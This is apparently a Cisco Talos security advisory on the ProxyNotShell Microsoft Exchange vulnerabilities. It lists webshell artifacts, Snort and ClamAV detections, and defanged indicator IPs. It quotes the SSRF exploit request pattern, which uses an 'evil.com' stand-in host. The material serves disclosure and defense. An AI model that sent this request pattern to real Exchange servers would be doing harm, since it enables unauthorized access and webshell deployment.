Even organizations that use Exchange Online may still be affected if they run a hybrid server.

Friday, September 30, 2022 17:09

Cisco Talos has released new coverage to detect and prevent the exploitation of two recently disclosed vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Servers 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute remote code on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a Server Side Request Forgery (SSRF) vulnerability, while CVE-2022-41082 enables Remote Code Execution (RCE) when PowerShell is accessible to the attackers.

While no fixes or patches are available yet, Microsoft has provided mitigations for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement mitigation steps while waiting for security patches for these vulnerabilities. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021 to deliver ransomware, and Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year.

**Vulnerability details and ongoing exploitation**

Exploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts:

autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com

Successful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the persistence of WebShells for continued access to compromised servers. Open-source reporting indicates that webShells such as Antsword, a popular Chinese language-based open-source webshell, SharPyShell an ASP.NET-based webshell and China Chopper have been deployed on compromised systems consisting of the following artifacts:

*   C:\\inetpub\\wwwroot\\aspnet\_client\\Xml.ashx
*   C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx
*   C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx
*   C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx

This activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet.

Initial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using cert util, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.

**Coverage**

  
Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing SID **60642** to protect against CVE-2022-41040.

In addition we are releasing SIDs **60637-60641** to protect against malicious activity observed during exploitation of CVE-2022-41082.

The existing SIDs **27966-27968, 28323, 37245, and 42834-42838** provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

*   Asp.Backdoor.AntSword-9972727-1
*   Asp.Backdoor.Awen-9972728-0
*   Asp.Backdoor.AntSword-9972729-0

**IOCs****IPs and URLs**

125\[.\]212\[.\]220\[.\]48  
5\[.\]180\[.\]61\[.\]17  
47\[.\]242\[.\]39\[.\]92  
61\[.\]244\[.\]94\[.\]85  
86\[.\]48\[.\]6\[.\]69  
86\[.\]48\[.\]12\[.\]64  
94\[.\]140\[.\]8\[.\]48  
94\[.\]140\[.\]8\[.\]113  
103\[.\]9\[.\]76\[.\]208  
103\[.\]9\[.\]76\[.\]211  
104\[.\]244\[.\]79\[.\]6  
112\[.\]118\[.\]48\[.\]186  
122\[.\]155\[.\]174\[.\]188  
125\[.\]212\[.\]241\[.\]134  
185\[.\]220\[.\]101\[.\]182  
194\[.\]150\[.\]167\[.\]88  
212\[.\]119\[.\]34\[.\]11  
137\[.\]184\[.\]67\[.\]33  
206\[.\]188\[.\]196\[.\]77  
hxxp://206\[.\]188\[.\]196\[.\]77:8080/themes.aspx

Tag

#rce